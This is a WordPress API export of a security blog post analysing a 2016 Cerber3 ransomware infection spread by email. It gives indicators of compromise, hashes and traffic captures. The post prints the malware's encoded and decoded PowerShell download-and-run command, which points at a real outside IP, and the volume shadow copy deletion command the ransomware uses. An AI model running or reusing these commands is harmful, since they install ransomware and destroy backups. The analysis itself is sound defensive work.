{"id":590,"date":"2016-09-29T13:01:01","date_gmt":"2016-09-29T12:01:01","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=590"},"modified":"2016-09-29T13:02:03","modified_gmt":"2016-09-29T12:02:03","slug":"2016-09-28-malspam-and-cerber3-infection","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=590","title":{"rendered":"2016-09-28 Malspam and Cerber3 Infection"},"content":{"rendered":"

So it has been a while since I have written something for the blog so I apologize for that. With that being said, here is a quick example of some malspam leading to a Cerber3 infection. Like it’s previous versions, the delivery method for this one was via email with a malicious attachment. In this case the zip file was password protected, which contained the malicious Word document. All the artifacts that I could gather along with the PCAP can be found at my Github repo here<\/a>. <\/p>\n

\"\"<\/a><\/p>\n

Indicators of Compromise
\n========================
\nrDNS: 0.234.184.31.in-addr.arpa – 52uo5k3t73ypjije.dk0urs.bid
\nbtc.blockr.io (Port 80)
\nhttp:\/\/80.82.64.45\/~yakar\/msvmonr.exe (Port 80)
\n31.184.234.0\/22 (Ports 137 \/ 6892 UDP)
\n52uo5k3t73ypjije.dk0urs.bid (Port 80)<\/p>\n

Artifacts From Investigation
\n============================
\nFile name: 241184246126.zip
\nFile size: 14KB
\nMD5 hash: 0c8581be623642896c72bd512cd84a4a
\nVirustotal: NA<\/p>\n

File name: 241184246126.doc
\nFile size: 36KB
\nMD5 hash: 1eebbe39b9ead009890882fdfec607fe
\nVirustotal: NA<\/p>\n

File name: msvmonr.exe
\nFile size: 223KB
\nMD5 hash: d5308ee219e0845a6819136b5d7f6a8b
\nVirustotal: NA<\/p>\n

File name: System.dll
\nFile size: 12KB
\nMD5 hash: 3e6bf00b3ac976122f982ae2aadb1c51
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/4ff9b2678d698677c5d9732678f9cf53f17290e09d053691aac4cc6e6f595cbe\/analysis\/<\/a>
\nDetection ratio: 0 \/ 57
\nFirst submission: 2014-10-07 09:22:47 UTC<\/p>\n

Traffic Analysis of Malware
\n===========================
\nOverall this was much like the other Cerber infections that I have discussed here<\/a> and here<\/a>. Once I unzipped the password protected Word document, I checked it out using OfficeMalScanner and by also just taking a look within the archive. OfficeMalScanner detected the same things that I was able to find when just looking inside the archive. There was nothing in the code that I could find so I decided to just run the Word document in my VM to see what happened. The first thing that it did was create a Powershell script to download a malicious binary from from hxxp:\/\/80.82.64.45\/~yakar\/msvmonr[.]exe and then run it. The script gets created in the “C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\” path. <\/p>\n

\"\"<\/a><\/p>\n

The Powershell script is base64 encoded:<\/p>\n

Original Code:<\/p>\n

\r\nPOWERSHELL.EXE powershell -window hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADAALgA4ADIALgA2ADQALgA0ADUALwB+AHkAYQBrAGEAcgAvAG0AcwB2AG0AbwBuAHIALgBlAHgAZQAnACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG0AcwB2AG0AbwBuAHIALgBlAHgAZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAbQBzAHYAbQBvAG4AcgAuAGUAeABlACIAKQA=<\/pre>\n
Decoded Code:<\/p>\n
\r\n(New-Object System.Net.WebClient).DownloadFile('http:\/\/80.82.64.45\/~yakar\/msvmonr.exe',"$env:APPDATA\\msvmonr.exe");Start-Process ("$env:APPDATA\\msvmonr.exe")<\/pre>\n
Below is the GET request for the malicious binary from Wireshark.<\/p>\n
\r\nGET \/~yakar\/msvmonr.exe HTTP\/1.1\r\nHost: 80.82.64.45\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 28 Sep 2016 08:57:35 GMT\r\nServer: Apache\/2.2.27 (Unix) mod_ssl\/2.2.27 OpenSSL\/1.0.1e-fips\r\nLast-Modified: Wed, 28 Sep 2016 08:55:02 GMT\r\nETag: "224c3-36880-53d8d844e9668"\r\nAccept-Ranges: bytes\r\nContent-Length: 223360\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application\/x-msdownload\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n$.......1.D9u.*ju.*ju.*j..ujw.*ju<\/pre>\n
While the “msvmonr.exe” process was running, I saw that it was talking to the 31.184.234.0\/22 network via UDP on source ports 137 and 58666 to the destination port of 137 and 6892. It looks like version 3 keeps the same pattern of talking to a large network block via UDP port 6892 just as the previous versions. The interesting thing was the fact that there were numerous rDNS (reverse DNS) queries being made to the same network block. <\/p>\n
\"\"<\/a><\/p>\n
Once the system has been infected and the files have been encrypted, I saw web traffic for the hosts 52uo5k3t73ypjije[.]dk0urs[.]bid and btc[.]blockr[.]io. These are related to the pages that Cerber creates to communicate that the system has been infected and what the next steps are.<\/p>\n
Host Investigation
\n==================
\nLike I stated above, the malware all stems from running the malicious Word document which then created a Powershell script that called the malicious binary (msvmonr.exe) which is what kicks everything off. From there it is pretty standard stuff as seen below:<\/p>\n
\"\"<\/a><\/p>\n
Once the “msvmonr.exe” process is up and running, it writes a bunch of files to the “C:\\Users\\Administrator\\AppData\\Local\\Temp” folder, some of which are webpages that are not related to the infection. I am not sure why these are created.<\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
It (msvmonr.exe) continues to process along and then it spawns a new instance of itself and kills off the “parent” instance. This new “child” process is the one that calls CMD.exe which then calls WMIC.exe to start deleting any volume shadow copies on the system via the “C:\\windows\\system32\\wbem\\wmic.exe  shadowcopy delete” command. Once that is done the malware completes encrypting the files on the system. It is only at that time the malware alerts the user that the system has been infected.<\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
So it has been a while since I have written something for the blog so I apologize for that. With that being said, here is a quick example of some malspam leading to a Cerber3 infection. Like it’s previous versions, the delivery method for this one was via email with a malicious attachment. In this case the zip file was password protected, which contained the malicious Word document. All the artifacts that I could gather along with the PCAP can be found at my Github repo here. Indicators of Compromise ======================== rDNS: 0.234.184.31.in-addr.arpa – 52uo5k3t73ypjije.dk0urs.bid btc.blockr.io (Port 80) http:\/\/80.82.64.45\/~yakar\/msvmonr.exe (Port…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-590","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/590","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=590"}],"version-history":[{"count":5,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/590\/revisions"}],"predecessor-version":[{"id":604,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/590\/revisions\/604"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=590"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=590"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=590"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}